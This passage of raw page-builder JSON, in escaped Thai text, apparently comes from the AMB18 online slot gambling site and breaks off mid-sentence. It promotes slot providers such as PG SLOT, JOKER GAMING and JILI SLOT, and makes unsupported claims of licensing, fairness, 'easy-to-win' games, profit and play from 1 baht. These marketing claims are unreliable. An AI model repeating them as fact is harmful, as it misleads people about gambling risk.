\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e04\\u0e32\\u0e27\\u0e1a\\u0e2d\\u0e22\\u0e2a\\u0e38\\u0e14\\u0e14\\u0e38\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e14 \\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21\\u0e16\\u0e39\\u0e01\\u0e04\\u0e31\\u0e14\\u0e2a\\u0e23\\u0e23\\u0e08\\u0e32\\u0e01\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e43\\u0e1a\\u0e2d\\u0e19\\u0e38\\u0e0d\\u0e32\\u0e15\\u0e16\\u0e39\\u0e01\\u0e15\\u0e49\\u0e2d\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e43\\u0e19\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e22\\u0e38\\u0e15\\u0e34\\u0e18\\u0e23\\u0e23\\u0e21 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e22\\u0e31\\u0e07\\u0e1b\\u0e23\\u0e31\\u0e1a\\u0e1b\\u0e23\\u0e38\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e23\\u0e47\\u0e27\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e42\\u0e2b\\u0e25\\u0e14\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e17\\u0e2d\\u0e23\\u0e4c\\u0e40\\u0e19\\u0e47\\u0e15\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e44\\u0e17\\u0e22 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e44\\u0e1b\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e15\\u0e47\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e9ff89c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-1-.webp\",\"id\":294,\"size\":\"\",\"alt\":\"yok789\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b749b2\",\"elType\":\"widget\",\"settings\":{\"title\":\"AMB18 \\u0e2a\\u0e38\\u0e14\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e33\\u0e40\\u0e02\\u0e49\\u0e32 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e31\\u0e07\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e27\\u0e47\\u0e1a \\u0e15\\u0e23\\u0e07 \\u0e41\\u0e15\\u0e01 \\u0e07\\u0e48\\u0e32\\u0e22 \\u0e25\\u0e48\\u0e32\\u0e2a\\u0e38\\u0e14 \\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e04\\u0e48\\u0e32\\u0e22\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\n\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a455b44\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e08\\u0e38\\u0e14\\u0e41\\u0e02\\u0e47\\u0e07\\u0e2d\\u0e35\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e02\\u0e2d\\u0e07 AMB18 \\u0e2a\\u0e38\\u0e14\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e33\\u0e40\\u0e02\\u0e49\\u0e32<\\/span> <span style=\\\"font-weight: 400;\\\">\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e31\\u0e07\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49 <\\/span><b>\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e27\\u0e47\\u0e1a \\u0e15\\u0e23\\u0e07 \\u0e41\\u0e15\\u0e01 \\u0e07\\u0e48\\u0e32\\u0e22 \\u0e25\\u0e48\\u0e32\\u0e2a\\u0e38\\u0e14 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e23\\u0e27\\u0e1a\\u0e23\\u0e27\\u0e21\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\u0e08\\u0e32\\u0e01\\u0e15\\u0e48\\u0e32\\u0e07\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e21\\u0e32\\u0e44\\u0e27\\u0e49\\u0e43\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e43\\u0e2b\\u0e49\\u0e27\\u0e38\\u0e48\\u0e19\\u0e27\\u0e32\\u0e22 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e23\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e14\\u0e31\\u0e07\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22 \\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e08\\u0e31\\u0e14\\u0e08\\u0e49\\u0e32\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e16\\u0e35\\u0e48 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e0b\\u0e34\\u0e23\\u0e4c\\u0e1f\\u0e40\\u0e27\\u0e2d\\u0e23\\u0e4c\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e19\\u0e32\\u0e19 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e40\\u0e27\\u0e2d\\u0e23\\u0e4c\\u0e0a\\u0e31\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e17\\u0e35\\u0e48\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e1b\\u0e25\\u0e48\\u0e2d\\u0e22\\u0e2d\\u0e2d\\u0e01\\u0e21\\u0e32\\u0e08\\u0e36\\u0e07\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e30\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e25\\u0e48\\u0e32\\u0e2a\\u0e38\\u0e14\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e43\\u0e04\\u0e23 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e2b\\u0e32\\u0e23\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"933afcf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21 PG SLOT<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07\\u0e43\\u0e19\\u0e04\\u0e48\\u0e32\\u0e22\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\u0e17\\u0e35\\u0e48\\u0e02\\u0e32\\u0e14\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49\\u0e04\\u0e37\\u0e2d PG SLOT \\u0e0b\\u0e36\\u0e48\\u0e07\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e04\\u0e21\\u0e0a\\u0e31\\u0e14\\u0e41\\u0e25\\u0e30\\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e2d\\u0e25\\u0e31\\u0e07\\u0e01\\u0e32\\u0e23 \\u0e40\\u0e01\\u0e21\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e21\\u0e35\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e41\\u0e25\\u0e30\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e01\\u0e23\\u0e30\\u0e15\\u0e38\\u0e49\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e27\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e40\\u0e01\\u0e47\\u0e1a\\u0e01\\u0e33\\u0e44\\u0e23 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e2d\\u0e31\\u0e15\\u0e23\\u0e32\\u0e01\\u0e32\\u0e23\\u0e08\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e21\\u0e14\\u0e38\\u0e25 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e16\\u0e36\\u0e07\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07\\u0e01\\u0e32\\u0e23\\u0e17\\u0e35\\u0e48\\u0e17\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e33\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e01\\u0e21\\u0e08\\u0e32\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49\\u0e08\\u0e36\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e43\\u0e19\\u0e04\\u0e38\\u0e13\\u0e20\\u0e32\\u0e1e\\u0e41\\u0e25\\u0e30\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21 JOKER GAMING<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">JOKER GAMING \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e35\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e32\\u0e22\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e23\\u0e39\\u0e49\\u0e08\\u0e31\\u0e01\\u0e01\\u0e31\\u0e19\\u0e14\\u0e35\\u0e43\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e18\\u0e35\\u0e21\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e41\\u0e19\\u0e27\\u0e40\\u0e2d\\u0e40\\u0e0a\\u0e35\\u0e22\\u0e44\\u0e1b\\u0e08\\u0e19\\u0e16\\u0e36\\u0e07\\u0e15\\u0e30\\u0e27\\u0e31\\u0e19\\u0e15\\u0e01\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e44\\u0e14\\u0e49\\u0e15\\u0e32\\u0e21\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e15\\u0e19\\u0e40\\u0e2d\\u0e07 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e16\\u0e39\\u0e01\\u0e1e\\u0e31\\u0e12\\u0e19\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1a\\u0e19\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e44\\u0e14\\u0e49\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e35\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e20\\u0e32\\u0e1e \\u0e20\\u0e32\\u0e1e\\u0e44\\u0e21\\u0e48\\u0e01\\u0e23\\u0e30\\u0e15\\u0e38\\u0e01 \\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19 \\u0e01\\u0e32\\u0e23\\u0e17\\u0e35\\u0e48\\u0e17\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e36\\u0e07\\u0e40\\u0e01\\u0e21\\u0e08\\u0e32\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e2a\\u0e23\\u0e34\\u0e21\\u0e17\\u0e31\\u0e1e \\u0e08\\u0e36\\u0e07\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1e\\u0e25\\u0e15\\u0e1f\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e23\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e25\\u0e38\\u0e49\\u0e19\\u0e01\\u0e33\\u0e44\\u0e23\\u0e41\\u0e1a\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e43\\u0e19\\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e17\\u0e35\\u0e48\\u0e40\\u0e23\\u0e49\\u0e32\\u0e43\\u0e08<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21 JILI SLOT<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">JILI SLOT \\u0e42\\u0e14\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e43\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e40\\u0e19\\u0e49\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e41\\u0e1b\\u0e25\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e2b\\u0e25\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e21\\u0e35\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e0b\\u0e49\\u0e2d\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e41\\u0e1a\\u0e1a\\u0e04\\u0e32\\u0e14\\u0e44\\u0e21\\u0e48\\u0e16\\u0e36\\u0e07 \\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e17\\u0e31\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e22 \\u0e42\\u0e17\\u0e19\\u0e2a\\u0e35\\u0e2a\\u0e14\\u0e43\\u0e2a \\u0e14\\u0e36\\u0e07\\u0e14\\u0e39\\u0e14\\u0e2a\\u0e32\\u0e22\\u0e15\\u0e32 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e21\\u0e48\\u0e19\\u0e48\\u0e32\\u0e40\\u0e1a\\u0e37\\u0e48\\u0e2d \\u0e19\\u0e2d\\u0e01\\u0e08\\u0e32\\u0e01\\u0e19\\u0e35\\u0e49\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e28\\u0e36\\u0e01\\u0e29\\u0e32\\u0e41\\u0e19\\u0e27\\u0e17\\u0e32\\u0e07\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u00a0<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cbf6885\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-1-.webp\",\"id\":294,\"size\":\"\",\"alt\":\"yok789\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ff86a53\",\"elType\":\"widget\",\"settings\":{\"title\":\" AMB18 \\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e21\\u0e31\\u0e19\\u0e2a\\u0e4c \\u0e41\\u0e21\\u0e49\\u0e21\\u0e35\\u0e07\\u0e1a\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14 \\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22\\u0e01\\u0e47\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2d\\u0e34\\u0e2a\\u0e23\\u0e30 \\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 1 \\u0e1a\\u0e32\\u0e17\\n\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"55e80bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e07\\u0e1a\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19\\u0e27\\u0e48\\u0e32\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e21\\u0e31\\u0e19\\u0e2a\\u0e4c\\u0e41\\u0e21\\u0e49\\u0e21\\u0e35\\u0e07\\u0e1a\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14 \\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22\\u0e01\\u0e47\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2d\\u0e34\\u0e2a\\u0e23\\u0e30\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 1 \\u0e1a\\u0e32\\u0e17\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e19\\u0e15\\u0e48\\u0e33\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e27\\u0e1a\\u0e04\\u0e38\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e44\\u0e14\\u0e49\\u0e07\\u0e48\\u0e32\\u0e22\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e15\\u0e32\\u0e21\\u0e07\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e07\\u0e27\\u0e25\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33\\u0e2a\\u0e39\\u0e07\\u0e40\\u0e01\\u0e34\\u0e19\\u0e44\\u0e1b 